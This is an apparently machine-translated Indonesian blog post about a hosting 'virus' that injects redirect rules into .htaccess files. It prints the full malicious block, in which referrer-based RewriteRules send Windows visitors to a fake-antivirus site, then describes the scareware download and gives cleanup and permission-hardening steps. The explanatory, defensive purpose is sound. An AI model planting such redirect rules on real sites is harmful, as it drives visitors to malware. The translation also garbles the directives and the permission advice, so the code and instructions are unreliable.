Sebuah bentuk baru virus yang saya lihat tidak tahu banyak, mempengaruhi situs host di server tidak dapat diandalkan di mana akun pengguna / akun subdomain dapat "terlihat" di antara mereka. Secara khusus, semua akun hosting dimasukkan ke dalam folder "vhosts“, Dan hak penulisan folder pengguna dari "vhosts" diberikan kepada pengguna umum… oleh pengecer dalam banyak situasi. Ini adalah metode khas server web yang tidak digunakan WHM / cPanel.
Cuprin
Tindakan virus .htaccess - hack .htaccess
Virus mempengaruhi file .htaccess Situs korban. Saya menambahkan baris / Direktif untuk mengarahkan pengunjung (berasal dari yahoo, msn, google, facebook, yaindex, twitter, myspace, dll. situs dan portal dengan lalu lintas tinggi) ke beberapa situs yang menawarkan "antivirus“. Ini tentang antivirus palsu, Yang saya tulis dalam pendahuluan Antivirus palsu Remover.
Ini adalah bagaimana .htaccess terpengaruh: (tidak mengakses URL konten di baris berikut)
ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3RewriteEngine On
RewriteCond% {HTTP_REFERER} * Yandex * $ [NC, OR]..
RewriteCond% {HTTP_REFERER}. * Odnoklassniki * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Vkontakte * $ [NC, OR].
RewriteCond% {HTTP_REFERER} * Rambler * $ [NC, OR]..
RewriteCond% {HTTP_REFERER} * Tabung * $ [NC, OR]..
RewriteCond% {HTTP_REFERER}. * Wikipedia * $ [NC, OR].
RewriteCond% {HTTP_REFERER} * Blogger. * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Baidu * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Qq.com * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Myspace * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Twitter * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Facebook * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Google * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Hidup * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Aol * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Bing * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Msn * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Amazon * $ [NC, OR].
RewriteCond% {HTTP_REFERER} * Ebay * $ [NC, OR]..
RewriteCond% {HTTP_REFERER}. * LinkedIn * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Flickr * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * LiveJasmin * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Soso * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * DoubleClick * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Pornhub * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Orkut * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * LiveJournal * $ [NC, OR].
Tulis UlangCond% {HTTP_REFERER}. *wordpress* $ [NC, ATAU]
RewriteCond% {HTTP_REFERER}. * Yahoo * $ [NC, OR].
RewriteCond% {HTTP_REFERER} * Ask * $ [NC, OR]..
RewriteCond% {HTTP_REFERER} * Excite * $ [NC, OR]..
RewriteCond% {HTTP_REFERER}. * AltaVista * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Msn * $ [NC, OR].
RewriteCond% {HTTP_REFERER} * Netscape * $ [NC, OR]..
RewriteCond% {HTTP_REFERER}. * HotBot * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Goto * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Infoseek * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Mamma * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Alltheweb * $ [NC, OR].
RewriteCond% {HTTP_REFERER}. * Lycos * $ [NC, OR].
RewriteCond% {HTTP_REFERER} * Pencarian * $ [NC, OR]..
Penulisan UlangCond %{HTTP_REFERER} .*metacrawler.*$ [NC,ATAU]
RewriteCond% {HTTP_REFERER} * Mail * $ [NC, OR]..
RewriteCond% {HTTP_REFERER}. * Dogpile * $ [NC].RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = r [R, L]RewriteCond% {REQUEST_FILENAME}-f!
RewriteCond% {} REQUEST_FILENAME!-D
Penulisan UlangCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = 4 [R, L]
Mereka yang menggunakan WordPress mereka akan menemukan baris-baris ini di file .htaccess dari public_html. Selain itu, virus ini akan membuat. Htaccess Identik dalam folder wp-konten.
*Ada juga situasi di mana sebaliknya terjadi peoriavascularsurgery.com dns.thesoulfoodcafe.com atau alamat lainnya.
Apa yang membuat virus ini.
Setelah diarahkan, pengunjung disambut dengan tangan terbuka oleh pesan:
PERINGATAN!
Komputer Anda berisi berbagai tanda keberadaan virus dan program malware. anda system membutuhkan pemeriksaan anti virus segera!
System Keamanan akan melakukan pemindaian PC Anda yang cepat dan gratis terhadap virus dan program jahat.
Tidak peduli tombol mana yang kami tekan, kami dibawa ke halaman "Komputer saya", Diciptakan untuk meniru desain XP. Di sinilah "proses pemindaian" dimulai secara otomatis, pada akhirnya kami menemukan bahwa "kami terinfeksi".
Setelah Anda mengklik OK atau Batal, itu akan mulai DownloadFile setup.exe. Ini setup.exe adalah anti virus palsu mempengaruhi sistem. Anda menginstal beberapa malware untuk menyebarkan virus lebih link, dan selain ini a anti-virus software (juga palsu) bahwa korban diundang untuk membeli.
Mereka yang telah menghubungi virus dapat menggunakan formulir ini Antivirus palsu Remover. Hal ini juga dianjurkan untuk memindai seluruh HDD. Sarankan Kaspersky Internet Security atau Kaspersky Anti Virus.
Jenis virus ini mempengaruhi pengunjung sistem operasi OS Windows XP, Windows ME Windows 2000, Windows NT Windows 98 si Windows 95. Sejauh ini belum diketahui kasus infeksi pada sistem operasi Windows Lihat ya Windows 7.
Bagaimana kita bisa menghapus htaccess virus. Pada server, dan bagaimana untuk mencegah infeksi.
1. Menganalisis file yang mencurigakan dan menghapus kode. Untuk memastikan bahwa file tersebut tidak hanya dipengaruhi .htaccess lebih baik menganalisis semua file . Php si . Js.
2. Menulis ulang berkas. Htaccess dan saya mengatur chmod 644 atau 744 dengan akses tulis hanya pengguna pemilik.
3. Bila Anda membuat account hosting untuk situs Web dalam folder / Home atau / Webroot Ini secara otomatis akan membuat folder yang sering memiliki nama pengguna (pengguna untuk cpanel, ftp, Dll). Untuk mencegah data menulis dan mengirimkan virus dari satu pengguna lain, dianjurkan bahwa setiap folder pengguna harus ditetapkan:
chmod 644 atau 744, 755 – 644 ditunjukkan.
chown -R nama pengguna folder_name.
chgrp-R nume_user nume_folder
ls-semua cara untuk memeriksa apakah mereka dibuat dengan benar. Akan muncul sesuatu seperti ini:
drwx - x - x 12 dinamics dinamics 4096 6 Mei 14:51 dinamics /
drwx - x - x 10 duran duran 4096 Mar 7 07:46 duran /
Tabung reaksi drwx - x - x 12 4096 29 Jan 11:23 tabung reaksi /
drwxr-xr-x 14 ekspres ekspres 4096 26 Feb 2009 ekspres /
drwxr-xr-x 9 ezo ezo 4096 19 Mei 01:09 ezo /
drwx - x - x 9 farma farma 4096 19 Des 22:29 farma /
Jika salah satu di atas akan userele FTP file yang terinfeksiIni tidak dapat mengirim virus ke host pengguna lain. Ini adalah jaring pengaman minimum untuk melindungi akun host pada server web.
Elemen umum dari daerah yang terkena jenis virus.
Semua domain yang terpengaruh mengarahkan pengunjung ke situs yang berisi nama domain "/main.php? s = 4 & H".
Ini "virus. htaccess”Mempengaruhi semua jenis CMS (joomla, WordPress, phpBBDll) yang menggunakan .htaccess.
.htaccess Peretasan & Pengalihan Virus.
